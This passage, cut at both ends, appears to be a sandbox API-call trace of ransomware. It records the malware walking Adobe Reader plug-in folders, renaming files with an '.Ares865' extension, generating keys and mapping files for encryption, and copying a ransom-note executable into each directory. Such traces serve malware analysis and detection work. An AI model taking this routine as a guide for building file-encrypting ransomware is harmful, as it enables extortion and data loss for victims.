hHeap=0x2b0000) returned 1 [0058.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.882] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.882] CloseHandle (hObject=0x15c) returned 1 [0058.882] CloseHandle (hObject=0x164) returned 1 [0058.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.884] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MCIMPP.CHS", cAlternateFileName="")) returned 1 [0058.884] lstrcmpiW (lpString1="MCIMPP.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.884] lstrcmpiW (lpString1="MCIMPP.CHS", lpString2="aoldtz.exe") returned 1 [0058.888] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CAT.Ares865") returned 93 [0058.888] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cat.ares865"), dwFlags=0x1) returned 1 [0058.889] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0058.889] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2560) returned 1 [0058.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.889] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.890] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.890] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.890] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x15c [0058.893] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x190000 [0058.894] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.894] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.894] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.895] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.895] CloseHandle (hObject=0x15c) returned 1 [0058.895] CloseHandle (hObject=0x164) returned 1 [0058.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.897] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QuickTime.CHS", cAlternateFileName="QUICKT~1.CHS")) returned 1 [0058.897] lstrcmpiW (lpString1="QuickTime.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.897] lstrcmpiW (lpString1="QuickTime.CHS", lpString2="aoldtz.exe") returned 1 [0058.897] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CAT.Ares865") returned 96 [0058.897] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cat.ares865"), dwFlags=0x1) returned 1 [0058.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0058.899] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2560) returned 1 [0058.899] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.899] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.899] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.899] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.900] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.900] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.900] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x15c [0058.901] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x190000 [0058.915] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.915] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.915] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.916] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.916] CloseHandle (hObject=0x15c) returned 1 [0058.916] CloseHandle (hObject=0x164) returned 1 [0058.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.918] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMedia.CHS", cAlternateFileName="WINDOW~1.CHS")) returned 1 [0058.918] lstrcmpiW (lpString1="WindowsMedia.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.918] lstrcmpiW (lpString1="WindowsMedia.CHS", lpString2="aoldtz.exe") returned 1 [0058.918] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations" [0058.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0058.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.918] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations") returned 68 [0058.918] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations" [0058.918] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.918] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.926] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.926] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a05ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a05ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.927] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.927] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.927] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps" [0058.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0058.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.927] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps") returned 75 [0058.927] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps" [0058.927] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.927] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.935] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.935] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a05ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a05ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.935] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.935] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.935] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR" [0058.935] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7ce8 | out: hHeap=0x2b0000) returned 1 [0058.935] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26e0 | out: hHeap=0x2b0000) returned 1 [0058.935] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR") returned 79 [0058.935] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR" [0058.935] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.935] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.963] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.963] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80600540, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a51f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a51f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.963] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.963] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.964] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR" [0058.964] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7c40 | out: hHeap=0x2b0000) returned 1 [0058.964] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26c0 | out: hHeap=0x2b0000) returned 1 [0058.964] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR") returned 79 [0058.964] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR" [0058.964] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.964] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.993] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.993] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806266a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a9e220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a9e220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.993] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.993] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.994] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE" [0058.994] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7b98 | out: hHeap=0x2b0000) returned 1 [0058.994] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26a0 | out: hHeap=0x2b0000) returned 1 [0058.994] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE") returned 79 [0058.994] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE" [0058.994] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.994] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.030] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.030] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b10640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b10640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.031] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.031] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.031] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO" [0059.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7af0 | out: hHeap=0x2b0000) returned 1 [0059.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2680 | out: hHeap=0x2b0000) returned 1 [0059.031] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO") returned 79 [0059.031] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO" [0059.031] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.031] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\HOW TO BACK YOUR FILES.exe" 